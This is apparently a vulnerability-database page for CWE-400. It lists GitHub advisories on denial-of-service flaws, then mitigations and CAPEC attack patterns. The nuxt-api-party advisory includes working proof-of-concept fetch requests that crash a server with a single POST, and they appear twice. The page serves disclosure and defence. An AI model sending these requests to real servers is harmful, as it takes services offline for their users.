Common Weakness Enumeration

CWE-400

Discouraged

Uncontrolled Resource Consumption

Abstraction: Class · Status: Draft

The product does not properly control the allocation and maintenance of a limited resource.

5425 vulnerabilities reference this CWE, most recent first.

GHSA-Q6HX-3M4P-749H

Vulnerability from github – Published: 2023-12-11 20:29 – Updated: 2023-12-11 20:29
VLAI
Summary
DOS by abusing `fetchOptions.retry`.
Details

Summary

nuxt-api-party allows developers to proxy requests to an API without exposing credentials to the client. ofetch is used to send the requests.

The library allows the user to send many options directly to ofetch. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow.

Details

fetchOptions are obtained directly from the request body. These are then passed directly into ofetch .

We can construct a URL we know will not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively.

PoC

POC using Node.

await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
    method: "POST",
    body: JSON.stringify({ path: "x:x", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

We can use __proto__ as a substitute for the endpoint if it is not known.

await fetch("http://localhost:3000/api/__api_party/__proto__", {
    method: "POST",
    body: JSON.stringify({ path: "x:x", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

We can build the size of the stack faster by using more complicated URIs

await fetch("http://localhost:3000/api/__api_party/__proto__", {
    method: "POST",
    body: JSON.stringify({ path: "data:x;base64,----", retry: 9999999 }),
    headers: { "Content-Type": "application/json" }
})

Impact

Full DOS, server is unusable during attack. Requires a single request.

Fix

Limit which options can be passed to ofetch.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "nuxt-api-party"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.22.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-49800"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-787"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-12-11T20:29:10Z",
    "nvd_published_at": "2023-12-09T00:15:07Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`nuxt-api-party` allows developers to proxy requests to an API without exposing credentials to the client. [`ofetch`](https://github.com/unjs/ofetch) is used to send the requests. \n\nThe library allows the user to send many options directly to `ofetch`. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow.\n\n### Details\n`fetchOptions` [are obtained directly from the request body](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L27). These are then [passed directly into `ofetch`\n](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L57C15-L57C15).\n\nWe can construct a URL we know will not fetch successfully, then set the retry attempts to a high value, this will cause a stack overflow as ofetch error handling works recursively. \n\n### PoC\nPOC using Node.\n\n```js\nawait fetch(\"http://localhost:3000/api/__api_party/MyEndpoint\", {\n    method: \"POST\",\n    body: JSON.stringify({ path: \"x:x\", retry: 9999999 }),\n    headers: { \"Content-Type\": \"application/json\" }\n})\n```\n\nWe can use `__proto__` as a substitute for the endpoint if it is not known.\n\n```js\nawait fetch(\"http://localhost:3000/api/__api_party/__proto__\", {\n    method: \"POST\",\n    body: JSON.stringify({ path: \"x:x\", retry: 9999999 }),\n    headers: { \"Content-Type\": \"application/json\" }\n})\n```\n\nWe can build the size of the stack faster by using more complicated URIs\n```js\nawait fetch(\"http://localhost:3000/api/__api_party/__proto__\", {\n    method: \"POST\",\n    body: JSON.stringify({ path: \"data:x;base64,----\", retry: 9999999 }),\n    headers: { \"Content-Type\": \"application/json\" }\n})\n```\n\n### Impact\nFull DOS, server is unusable during attack. Requires a single request. \n\n### Fix \nLimit which options can be passed to `ofetch`.\n",
  "id": "GHSA-q6hx-3m4p-749h",
  "modified": "2023-12-11T20:29:10Z",
  "published": "2023-12-11T20:29:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/johannschopplich/nuxt-api-party/security/advisories/GHSA-q6hx-3m4p-749h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49800"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/johannschopplich/nuxt-api-party"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "DOS by abusing `fetchOptions.retry`. "
}

GHSA-Q6VM-3Q95-JVVP

Vulnerability from github – Published: 2022-05-11 00:01 – Updated: 2022-05-19 00:00
VLAI
Details

An issue has been discovered in GitLab affecting all versions starting from 12.10 before 14.8.6, all versions starting from 14.9 before 14.9.4, all versions starting from 14.10 before 14.10.1. GitLab was not correctly handling malicious requests to the PyPi API endpoint allowing the attacker to cause uncontrolled resource consumption.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-1431"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-05-10T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue has been discovered in GitLab affecting all versions starting from 12.10 before 14.8.6, all versions starting from 14.9 before 14.9.4, all versions starting from 14.10 before 14.10.1. GitLab was not correctly handling malicious requests to the PyPi API endpoint allowing the attacker to cause uncontrolled resource consumption.",
  "id": "GHSA-q6vm-3q95-jvvp",
  "modified": "2022-05-19T00:00:20Z",
  "published": "2022-05-11T00:01:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1431"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/996850"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1431.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/262724"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q6WW-C56F-5FHW

Vulnerability from github – Published: 2022-05-24 17:03 – Updated: 2024-04-04 02:43
VLAI
Details

In Apache SpamAssassin before 3.4.3, a message can be crafted in a way to use excessive resources. Upgrading to SA 3.4.3 as soon as possible is the recommended fix but details will not be shared publicly.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-12420"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-12-12T23:15:00Z",
    "severity": "HIGH"
  },
  "details": "In Apache SpamAssassin before 3.4.3, a message can be crafted in a way to use excessive resources. Upgrading to SA 3.4.3 as soon as possible is the recommended fix but details will not be shared publicly.",
  "id": "GHSA-q6ww-c56f-5fhw",
  "modified": "2024-04-04T02:43:16Z",
  "published": "2022-05-24T17:03:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12420"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2019/dsa-4584"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4237-2"
    },
    {
      "type": "WEB",
      "url": "https://usn.ubuntu.com/4237-1"
    },
    {
      "type": "WEB",
      "url": "https://svn.apache.org/repos/asf/spamassassin/branches/3.4/build/announcements/3.4.3.txt"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Dec/27"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00019.html"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r3d32ebf97b1245b8237763444e911c4595d2ad5e34a1641840d8146f%40%3Cusers.spamassassin.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r2578c486552637bfedbe624940cc60d6463bd90044c887bdebb75e74%40%3Cusers.spamassassin.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/e3c2367351286b77a74a082e2b66b793cceefa7b6ea9dcd162db4c4b@%3Cdev.spamassassin.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/e3c2367351286b77a74a082e2b66b793cceefa7b6ea9dcd162db4c4b%40%3Cdev.spamassassin.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/64cf76749956dd08f7d5b86ec9f3321f382cfd7fe717ccd1be940c92@%3Cannounce.spamassassin.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/64cf76749956dd08f7d5b86ec9f3321f382cfd7fe717ccd1be940c92%40%3Cannounce.spamassassin.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/5ef362d6da12126fafc81443309ca95d872d1bfd011fe4b2699f0fe9@%3Cusers.spamassassin.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/5ef362d6da12126fafc81443309ca95d872d1bfd011fe4b2699f0fe9%40%3Cusers.spamassassin.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/5863d6c42fc9595a29566732f12348cde0ca0e41bda91695c62041de@%3Cannounce.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/5863d6c42fc9595a29566732f12348cde0ca0e41bda91695c62041de%40%3Cannounce.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://bz.apache.org/SpamAssassin/show_bug.cgi?id=7747"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2019/12/12/2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q727-99H7-2WCW

Vulnerability from github – Published: 2022-01-26 00:00 – Updated: 2022-02-02 00:02
VLAI
Details

On BIG-IP AFM version 16.x before 16.1.0, 15.1.x before 15.1.4.1, 14.1.x before 14.1.4.2, and all versions of 13.1.x, when the IPsec application layer gateway (ALG) logging profile is configured on an IPsec ALG virtual server, undisclosed IPsec traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-23024"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-25T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "On BIG-IP AFM version 16.x before 16.1.0, 15.1.x before 15.1.4.1, 14.1.x before 14.1.4.2, and all versions of 13.1.x, when the IPsec application layer gateway (ALG) logging profile is configured on an IPsec ALG virtual server, undisclosed IPsec traffic can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.",
  "id": "GHSA-q727-99h7-2wcw",
  "modified": "2022-02-02T00:02:00Z",
  "published": "2022-01-26T00:00:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23024"
    },
    {
      "type": "WEB",
      "url": "https://support.f5.com/csp/article/K54892865"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-Q757-G3QV-54VF

Vulnerability from github – Published: 2022-04-05 00:00 – Updated: 2022-04-12 00:00
VLAI
Details

A denial of service vulnerability when rendering RDoc files in GitLab CE/EE versions 10 to 14.7.7, 14.8.0 to 14.8.5, and 14.9.0 to 14.9.2 allows an attacker to crash the GitLab web application with a maliciously crafted RDoc file

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-1185"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-04-04T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A denial of service vulnerability when rendering RDoc files in GitLab CE/EE versions 10 to 14.7.7, 14.8.0 to 14.8.5, and 14.9.0 to 14.9.2 allows an attacker to crash the GitLab web application with a maliciously crafted RDoc file",
  "id": "GHSA-q757-g3qv-54vf",
  "modified": "2022-04-12T00:00:50Z",
  "published": "2022-04-05T00:00:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1185"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/1415071"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1185.json"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/349148"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q75G-2496-MXPP

Vulnerability from github – Published: 2018-07-24 20:11 – Updated: 2020-08-31 18:26
VLAI
Summary
Regular Expression Denial of Service in parsejson
Details

Affected versions of parsejson are vulnerable to a regular expression denial of service when parsing untrusted user input.

Recommendation

The parsejson package has not been functionally updated since it was initially released.

Additionally, it provides functionality which is natively included in Node.js, and therefore the native JSON.parse() should be used, for both performance and security reasons.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "parsejson"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2017-16113"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-06-16T21:51:20Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "Affected versions of `parsejson` are vulnerable to a regular expression denial of service when parsing untrusted user input.\n\n\n## Recommendation\n\nThe `parsejson` package has not been functionally updated since it was initially released.\n\nAdditionally, it provides functionality which is natively included in Node.js, and therefore the native `JSON.parse()` should be used, for both performance and security reasons.",
  "id": "GHSA-q75g-2496-mxpp",
  "modified": "2020-08-31T18:26:32Z",
  "published": "2018-07-24T20:11:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16113"
    },
    {
      "type": "WEB",
      "url": "https://github.com/get/parsejson/issues/4"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-q75g-2496-mxpp"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/528"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Regular Expression Denial of Service in parsejson"
}

GHSA-Q779-HHJ4-JVFQ

Vulnerability from github – Published: 2025-08-19 21:30 – Updated: 2025-08-20 18:30
VLAI
Details

Malicious scripts could bypass the popup blocker to spam new tabs, potentially resulting in denial of service attacks This vulnerability affects Firefox for iOS < 142.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-55029"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-19T21:15:28Z",
    "severity": "HIGH"
  },
  "details": "Malicious scripts could bypass the popup blocker to spam new tabs, potentially resulting in denial of service attacks This vulnerability affects Firefox for iOS \u003c 142.",
  "id": "GHSA-q779-hhj4-jvfq",
  "modified": "2025-08-20T18:30:20Z",
  "published": "2025-08-19T21:30:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55029"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1973577"
    },
    {
      "type": "WEB",
      "url": "https://www.mozilla.org/security/advisories/mfsa2025-68"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q7CG-457F-VX79

Vulnerability from github – Published: 2026-06-11 13:27 – Updated: 2026-06-12 19:28
VLAI
Summary
joi has an uncaught RangeError on deeply nested input through recursive `link()` schemas
Details

Impact

Denial of service via untrapped exception in services validating user-supplied JSON / object input with recursive link schemas.

The blast radius depends on how the application invokes joi: - Highest impact: validate() called without try/catch in a request handler would cause an unhandled exception, potentially crashing the process. - Lower impact: validateAsync() or validate() inside a try/catch, the validation fails, but the error type is RangeError rather than a structured ValidationError, complicating error handling.

Patches

Upgrade to version >= 18.2.1.

Workarounds

Try/catch the validation to avoid uncaught exceptions.

References

  • Pull request: hapijs/joi#3113
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "joi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "18.0.0"
            },
            {
              "fixed": "18.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "joi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "17.13.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48038"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-248",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-11T13:27:32Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Impact\nDenial of service via untrapped exception in services validating user-supplied JSON / object input with recursive link schemas. \n\nThe blast radius depends on how the application invokes joi:\n- Highest impact: `validate()` called without `try/catch` in a request handler would cause an unhandled exception, potentially crashing the process.\n- Lower impact: `validateAsync()` or `validate()` inside a `try/catch`, the validation fails, but the error type is `RangeError` rather than a structured `ValidationError`, complicating error handling.\n\n### Patches\nUpgrade to version \u003e= 18.2.1.\n\n### Workarounds\nTry/catch the validation to avoid uncaught exceptions.\n\n### References\n- Pull request: hapijs/joi#3113",
  "id": "GHSA-q7cg-457f-vx79",
  "modified": "2026-06-12T19:28:27Z",
  "published": "2026-06-11T13:27:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hapijs/joi/security/advisories/GHSA-q7cg-457f-vx79"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hapijs/joi/pull/3113"
    },
    {
      "type": "WEB",
      "url": "https://github.com/hapijs/joi/commit/2392713d3e9dd91ba752ac0c96e0eaf3d24b9a11"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hapijs/joi"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "joi has an uncaught RangeError on deeply nested input through recursive `link()` schemas"
}

GHSA-Q7MH-PW55-9H55

Vulnerability from github – Published: 2026-03-06 18:31 – Updated: 2026-03-10 18:31
VLAI
Details

Binutils objdump contains a denial-of-service vulnerability when processing a crafted binary with malformed DWARF debug_rnglists data. A logic error in the handling of the debug_rnglists header can cause objdump to repeatedly print the same warning message and fail to terminate, resulting in an unbounded logging loop until the process is interrupted. The issue was observed in binutils 2.44. A local attacker can exploit this vulnerability by supplying a malicious input file, leading to excessive CPU and I/O usage and preventing completion of the objdump analysis.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-69646"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-06T18:16:16Z",
    "severity": "MODERATE"
  },
  "details": "Binutils objdump contains a denial-of-service vulnerability when processing a crafted binary with malformed DWARF debug_rnglists data. A logic error in the handling of the debug_rnglists header can cause objdump to repeatedly print the same warning message and fail to terminate, resulting in an unbounded logging loop until the process is interrupted. The issue was observed in binutils 2.44. A local attacker can exploit this vulnerability by supplying a malicious input file, leading to excessive CPU and I/O usage and preventing completion of the objdump analysis.",
  "id": "GHSA-q7mh-pw55-9h55",
  "modified": "2026-03-10T18:31:14Z",
  "published": "2026-03-06T18:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69646"
    },
    {
      "type": "WEB",
      "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33638"
    },
    {
      "type": "WEB",
      "url": "https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=598704a00cbac5e85c2bedd363357b5bf6fcee33"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-Q7W5-CQ9G-VHW8

Vulnerability from github – Published: 2022-05-24 19:18 – Updated: 2024-06-21 21:33
VLAI
Details

Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-35559"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-10-20T11:16:00Z",
    "severity": "MODERATE"
  },
  "details": "Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).",
  "id": "GHSA-q7w5-cq9g-vhw8",
  "modified": "2024-06-21T21:33:50Z",
  "published": "2022-05-24T19:18:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-35559"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2021/dsa-5012"
    },
    {
      "type": "WEB",
      "url": "https://www.debian.org/security/2021/dsa-5000"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20240621-0006"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20211022-0004"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202209-05"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V362B2BWTH5IJDL45QPQGMBKIQOG7JX5"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GXTUWAWXVU37GRNIG4TPMA47THO6VAE6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GTYZWIXDFUV2H57YQZJWPOD3BC3I3EIQ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DJILEHYV2U37HKMGFEQ7CAVOV4DUWW2O"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7WTVCIVHTX3XONYOEGUMLKCM4QEC6INT"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6EUURAQOIJYFZHQ7DFZCO6IKDPIAWTNK"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/V362B2BWTH5IJDL45QPQGMBKIQOG7JX5"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GXTUWAWXVU37GRNIG4TPMA47THO6VAE6"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GTYZWIXDFUV2H57YQZJWPOD3BC3I3EIQ"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DJILEHYV2U37HKMGFEQ7CAVOV4DUWW2O"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7WTVCIVHTX3XONYOEGUMLKCM4QEC6INT"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6EUURAQOIJYFZHQ7DFZCO6IKDPIAWTNK"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2021/11/msg00008.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Design throttling mechanisms into the system architecture. The best protection is to limit the amount of resources that an unauthorized user can cause to be expended. A strong authentication and access control model will help prevent such attacks from occurring in the first place. The login application should be protected against DoS attacks as much as possible. Limiting the database access, perhaps by caching result sets, can help minimize the resources expended. To further limit the potential for a DoS attack, consider tracking the rate of requests received from users and blocking requests that exceed a defined rate threshold.

Mitigation
Architecture and Design
  • Mitigation of resource exhaustion attacks requires that the target system either:
  • The first of these solutions is an issue in itself though, since it may allow attackers to prevent the use of the system by a particular valid user. If the attacker impersonates the valid user, they may be able to prevent the user from accessing the server in question.
  • The second solution is simply difficult to effectively institute -- and even when properly done, it does not provide a full solution. It simply makes the attack require more resources on the part of the attacker.
  • recognizes the attack and denies that user further access for a given amount of time, or
  • uniformly throttles all requests in order to make it more difficult to consume resources more quickly than they can again be freed.
Mitigation
Architecture and Design

Ensure that protocols have specific limits of scale placed on them.

Mitigation
Implementation

Ensure that all failures in resource allocation place the system into a safe posture.

CAPEC-147: XML Ping of the Death

An attacker initiates a resource depletion attack where a large number of small XML messages are delivered at a sufficiently rapid rate to cause a denial of service or crash of the target. Transactions such as repetitive SOAP transactions can deplete resources faster than a simple flooding attack because of the additional resources used by the SOAP protocol and the resources necessary to process SOAP messages. The transactions used are immaterial as long as they cause resource utilization on the target. In other words, this is a normal flooding attack augmented by using messages that will require extra processing on the target.

CAPEC-227: Sustained Client Engagement

An adversary attempts to deny legitimate users access to a resource by continually engaging a specific resource in an attempt to keep the resource tied up as long as possible. The adversary's primary goal is not to crash or flood the target, which would alert defenders; rather it is to repeatedly perform actions or abuse algorithmic flaws such that a given resource is tied up and not available to a legitimate user. By carefully crafting a requests that keep the resource engaged through what is seemingly benign requests, legitimate users are limited or completely denied access to the resource.

CAPEC-492: Regular Expression Exponential Blowup

An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.